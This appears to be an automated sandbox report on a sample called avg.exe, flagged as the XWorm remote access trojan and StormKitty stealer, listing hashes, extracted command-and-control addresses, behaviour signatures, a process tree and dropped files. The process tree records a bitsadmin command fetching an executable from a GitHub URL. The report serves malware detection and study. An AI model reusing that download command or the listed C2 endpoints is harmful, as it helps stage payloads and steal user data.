Overview

overview

10

Static

static

10

avg.exe

windows7-x64

10

avg.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    383s
  • max time network
    398s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2024 17:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    avg.exe

  • Size

    51KB

  • MD5

    c523062e513acd24dcc7e9359f34bffb

  • SHA1

    5aa43c875ee2e8645ef4206df755dd22013c0173

  • SHA256

    02fdfbf888ed7f389c70d2afd74f6f04e4cf78ad35afa4ad5cd117899e8fcb74

  • SHA512

    2c953d6337a7b932a66146034082d2f58894895ed798ed0e8d417690458319ab776bc381e1aa2d45574d1e35b1b1c04c3f990c21adbe4f587bbbaa5ba165cacf

  • SSDEEP

    768:mdKpmtBsOH18MjV/WybXgxXbkb03OTSi/yuxwoQOphA3W1t9:my6T3/rbXskb03O1/yuxXQOpm3A9

Score
10/10
stormkittyxwormdiscoverydropperratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

147.185.221.16:40164

147.185.221.20:40164
Attributes
  • install_file

    System Volume Information Prefetch.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Opens file in notepad (likely ransom note) 3 IoCs
    ransomware
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\avg.exe
    "C:\Users\Admin\AppData\Local\Temp\avg.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1628
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1008
    • C:\Users\Admin\Desktop\avg.exe
      "C:\Users\Admin\Desktop\avg.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1100
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2252
    • C:\Program Files\7-Zip\7zG.exe
      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6867:90:7zEvent17961
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3412
    • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
      "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:408
    • C:\Windows\System32\NOTEPAD.EXE
      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Compiled_Project\output.bat
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:3880
    • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
      "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1812
    • C:\Windows\System32\NOTEPAD.EXE
      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Compiled_Project\output.cmd
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:4772
    • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
      "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.cmdline"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E4D.tmp" "c:\Users\Admin\Desktop\Compiled_Project\CSC173AA8D924934FCABDCC4C7BD0439.TMP"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5112
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Compiled_Project\output.bat" "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4224
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer "mdj" /download /priority FOREGROUND "https://github.com/uwhf/blank/blob/main/test.exe" "C:\Users\Admin\AppData\Local\Temp\\test.exe"
        2⤵
        • Download via BitsAdmin
        PID:3540

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TheDropper.exe.log
      Filesize

      1KB

      MD5

      6df2f9d8bae5cf10e5f71b15078141c9

      SHA1

      64163e2f7b6b205e19753d257ebe2222b1a5cabc

      SHA256

      28c4c6492165483314006723b9384b03921a26a10480b430ef2e8382e5782da8

      SHA512

      9b35546a56a3a76a0aba591b1e97134fe4168ec435ea3e0772520cf1aec1f62da94e8cc4da6d70de8b9001f336df7a73314afc10ec710bb0a3b4354e99896bc2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RES6E4D.tmp
      Filesize

      1KB

      MD5

      18b9707c9db11429792b4cbbea4ca239

      SHA1

      4adb5b2ef99bc2f01cfa8fba15df3b70506040bd

      SHA256

      1fce377a9a45f0eaafc040d54fa21b835115acf1ed98b6b7d55213f343ce441c

      SHA512

      8476c9f6d9666a01290325f130b1cc8da2a8ec99aefb3d6e4b9a4889188cd5e1ca7668305c64f87042a4253ab7216ab1c36bc7d2ff7b56779cb86b0f39c116df

      Download Submit

    • C:\Users\Admin\Desktop\Compiled_Project.zip
      Filesize

      52KB

      MD5

      ef33fc09ca18c8d3e01ae1dd7ce1f7da

      SHA1

      f74e2a033c4ca904c86a37eb536ca77c42db3b8a

      SHA256

      94460534a0d75a84ba6adbc657fc112a2e8d13924b377bfb295a8a98f6cf5683

      SHA512

      80e5701ca4dbe46bd1602a275223dc0014cfc21293823df348f613058aaaa3f415c4482cb5c0135300a4a66754693091db91851b315d2b421d56171928d01edd

      Download Submit

    • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
      Filesize

      149KB

      MD5

      95861defb10a7d2a8012c3e0b1b9447d

      SHA1

      e959f88bcb26bde9074fa5a8e447a77a57514b41

      SHA256

      80e8b7030e205c526c5d0eea0abd680d8cacaf3f86d6dc6a3e7081f927b13215

      SHA512

      ddbdc019baed346abc3d8518f19228826d4656b668808134cc710f82b60d2f337683f794c5e0a6036e272077d02abff51d1d03a4c5852eda5ac2f19ebf27320c

      Download Submit

    • C:\Users\Admin\Desktop\Compiled_Project\output.bat
      Filesize

      209B

      MD5

      bf0f1300f5d8138b367b8febff230b88

      SHA1

      46750bf8b2a0138ab5a41ccd7b9f760bff97d021

      SHA256

      d7c39b400b5d4aa4700e801842a9600725a187306643354b7dabd99863819eba

      SHA512

      0658e76096fb83e861b4596ff66791a31a4d96df481919ab42ae3539ffad6d8022f1889fc7514f35ad90cd72d566fc6cf73f4eb6135f52fb6e74d496967ec3f2

      Download Submit

    • C:\Users\Admin\Desktop\Compiled_Project\output.exe
      Filesize

      4KB

      MD5

      9c1bc2b29b708a8bf535a7edca43262b

      SHA1

      d164baa5f5992bd1d04f6fcacb8893cbc7ca8da4

      SHA256

      51edd02b6b8faa398a0fc7c0cd211f53bbc9e22fcc0dcfda499950ce18a9da54

      SHA512

      44d05213f8caba7671cb930e5aeff889b6ce6afc1a08f4c274f20e9c3a2bfee099d9ffffcdd616983cd465680f4c563b921fdcc5e43669fb7b00bafcb632b782

      Download Submit

    • C:\Users\Admin\Desktop\Compiled_Project\plugin.dll
      Filesize

      5KB

      MD5

      c0d1f52e3b18132112b2b0fc67421596

      SHA1

      20a995e7b4ffee23ef249633275fc87ea77fbeb7

      SHA256

      972d708e74268122a4816f27cce4d00015e586b983c4ce2eee5889f45687f728

      SHA512

      d65ec29e43be269b397958a6e46427e096159f7f7cac1edb82fbc7148cbee7159d5ba97eb2009a235defa41c3ada4764e0584bc3f1e086001711c6140331f86b

      Download Submit

    • C:\Users\Admin\Desktop\a.txt
      Filesize

      52B

      MD5

      a619f5a064016385e17548a302bc6467

      SHA1

      2c6134f05349283510b7a8846974681f56fba60c

      SHA256

      dc235543d5a7bd76875275db9bb0516d54a9465a89124e080e5b32938a8aaea1

      SHA512

      477220bd7a25dcfdc99ff846025b61f59e2ce79e6ede1eb68ba112982aded0b36167253389425f7ef6858c0faa21ab9a9f0fac13314596530e3136aa688e4e41

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.0.cs
      Filesize

      1KB

      MD5

      0f7dddf42fb4dcf0c5e286cb532a0f9f

      SHA1

      be51bc556a5c1c0d2e87742f9e8a992ad605ce30

      SHA256

      0398acb6380407a122988fdd46bb55544131581ff360e1d0fdd6df128f1319d6

      SHA512

      a4f1f11168cc702e957f472fe7661ca61486450bc29664b80d2d93f6c64e0c62bdb35fc895795b30f7b8977eabdc43608da1390a5b29a041aea4eaa23e7d8f73

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.cmdline
      Filesize

      184B

      MD5

      32ace708ff976961ec706b1eed0bc002

      SHA1

      2593f0a56cb1c98bd74d72e2b2f99aedb6c11b1e

      SHA256

      72164b42f305ec86c8f0f15cc5b96acc2b3c9b4cb7572d3f9dcf25975a5f908c

      SHA512

      58d45347b27fd935d8fcb14236f01263c8cdacf11c671d0d5f68c8225ea01cae3460098ce44b44e9c0ab6a72474a33b3cc17c88741ddb296587bc13deacf8958

      Download Submit

    • \??\c:\Users\Admin\Desktop\Compiled_Project\CSC173AA8D924934FCABDCC4C7BD0439.TMP
      Filesize

      1KB

      MD5

      2c8070f084ff635f9e016b831cd6ef16

      SHA1

      84d8287a21eaf176ebd7b3efe8571b3862de873a

      SHA256

      535d007133ddae112030480aac0b6954d4aac98bcd69b0ef192a010770564a4f

      SHA512

      f7dd550984e579912cf8fa688c53985308862954688b44482c83c05d61274519812a5ea9b6ddcfcd8972d117c8e3edfa6da0e23f3c8ea17ef0bdab80bf0d4c1f

      Download Submit

    • memory/408-62-0x0000000000390000-0x00000000003BC000-memory.dmp

      Filesize

      176KB

      Download

    • memory/408-71-0x0000000005F50000-0x0000000005F58000-memory.dmp

      Filesize

      32KB

      Download

    • memory/408-66-0x00000000081F0000-0x0000000008266000-memory.dmp

      Filesize

      472KB

      Download

    • memory/408-65-0x0000000004DC0000-0x0000000004DCA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/408-63-0x0000000005390000-0x0000000005934000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/408-64-0x0000000004DE0000-0x0000000004E72000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1100-6-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1100-4-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1628-0-0x00007FFE02453000-0x00007FFE02455000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1628-48-0x000000001D660000-0x000000001D710000-memory.dmp

      Filesize

      704KB

      Download

    • memory/1628-47-0x000000001D2E0000-0x000000001D302000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1628-49-0x000000001DE40000-0x000000001E368000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/1628-8-0x000000001CF70000-0x000000001D08E000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/1628-7-0x000000001CC20000-0x000000001CF70000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1628-3-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1628-2-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1628-1-0x0000000000FF0000-0x0000000001004000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2612-93-0x0000000005F60000-0x0000000005F68000-memory.dmp

      Filesize

      32KB

      Download